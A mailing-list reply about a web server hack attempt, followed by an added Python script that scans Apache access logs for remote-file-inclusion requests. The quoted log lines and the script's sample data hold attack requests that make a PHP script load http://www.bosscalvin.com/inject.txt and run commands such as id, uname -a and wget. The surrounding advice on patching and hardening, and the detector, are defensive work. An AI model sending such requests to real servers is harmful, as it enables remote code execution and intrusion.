Re: Hack attempt
hi norbert
> "GET /<some script>.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"
time for you to patch and update to latest php
or better still, turn it off esp if you don't need it
tons of things to fix up ... to harden the server
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a
> bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=wget
time to remove wget, lynx, and equiv apps
> Has someone seen this kind of attack ?
it's either eggdrop or modified clones/derivatives
> (chkrootkit doesn't detect it).
so much for chkrootkit :-)
smart/intelligent people investigating for "what's cooking" is better
than automated tools
> Has someone heard of this www.bosscalvin.com (or www.calvinmumu.org) ?
> Is there a way to stop this guy ? His nickname (CaEm) appears in the
> uploaded scripts.
probably another cracked box ... long list to follow to find the
actual cracker
c ya
alvin
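
Added example, not part of the original e-mail or written by either poster: a small Python scan of an Apache access log for the pattern quoted above, a query parameter whose value is a remote URL. The client addresses, timestamps and the script name /page.php are constructed placeholders; only the bodyfile/cmd query strings and the user-agent come from the quoted log lines.

```python
import re
from urllib.parse import parse_qsl

# Apache common/combined log prefix: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) ')
# A parameter value that starts with a URL scheme points the script at a remote file.
REMOTE_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (addresses, dates and /page.php are placeholders).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2005:10:00:00 +0100] "GET /page.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=id HTTP/1.0" 200 6625 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98)"',
    '192.0.2.10 - - [01/Jan/2005:10:00:05 +0100] "GET /page.php?bodyfile=http://www.bosscalvin.com/inject.txt?&cmd=uname%20-a HTTP/1.0" 200 6625 "-" "-"',
    '192.0.2.20 - - [01/Jan/2005:10:01:00 +0100] "GET /page.php?bodyfile=news.txt HTTP/1.1" 200 512 "-" "-"',
    '192.0.2.30 - - [01/Jan/2005:10:02:00 +0100] "GET /index.html HTTP/1.1" 404 209 "-" "-"',
]

def find_remote_includes(lines):
    """Return one finding per query parameter whose value is a remote URL."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line this pattern understands
        client, _method, target, status = m.groups()
        path, _, query = target.partition("?")
        params = parse_qsl(query, keep_blank_values=True)  # also URL-decodes values
        for name, value in params:
            if REMOTE_RE.match(value):
                findings.append({
                    "client": client,
                    "path": path,
                    "param": name,
                    "remote_url": value,
                    # 2xx: the script answered, so check whether it fetched the URL
                    "served": status.startswith("2"),
                    # whatever else was passed along, e.g. a decoded cmd= value
                    "other_params": [(n, v) for n, v in params if n != name],
                })
    return findings

if __name__ == "__main__":
    for f in find_remote_includes(SAMPLE):
        print(f["client"], f["path"], f["param"], f["remote_url"], f["served"], f["other_params"])
```

Each finding names the script and parameter to review, and a served value of True marks the requests that got a 2xx answer.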
- References:
- Hack attempt
- From: Norbert Crettol <norbert.crettol@idiap.ch>